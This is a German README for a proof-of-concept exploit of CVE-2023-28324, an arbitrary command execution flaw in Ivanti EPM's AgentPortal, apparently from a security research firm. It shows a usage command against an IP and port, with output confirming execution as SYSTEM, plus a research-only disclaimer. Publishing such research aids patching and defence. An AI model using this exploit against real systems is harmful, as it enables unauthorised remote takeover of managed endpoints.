
Ivanti EPM AgentPortal RCE-Schwachstelle
POC für CVE-2023-28324, das Ivanti EPM betrifft.
Eine technische Ursachenanalyse der Schwachstelle finden Sie in unserem Blog: https://www.horizon3.ai/attack-research/attack-blogs/cve-2023-28324-deep-dive/
Dieser POC missbraucht eine Schwachstelle in AgentPortal.exe, um beliebige Befehle auszuführen. Damit dieser POC funktioniert, müssen Sie eigene Referenzen auf AgentPortal.exe und APCommon.dll aus einer Ivanti EPM-Installation bereitstellen.
CVE-2023-28324.exe 192.168.1.21 49668 whoami.exe
Sending request.
Request result: True
Waiting for result.
Waiting for result.
Result: nt authority\system
Diese Software wurde ausschließlich für akademische Forschungszwecke und für die Entwicklung effektiver Abwehrtechniken erstellt und ist nicht dazu gedacht, Systeme anzugreifen, es sei denn, dies wurde ausdrücklich genehmigt. Die Projektbetreuer übernehmen keine Verantwortung oder Haftung für Missbrauch der Software. Gehen Sie verantwortungsvoll damit um.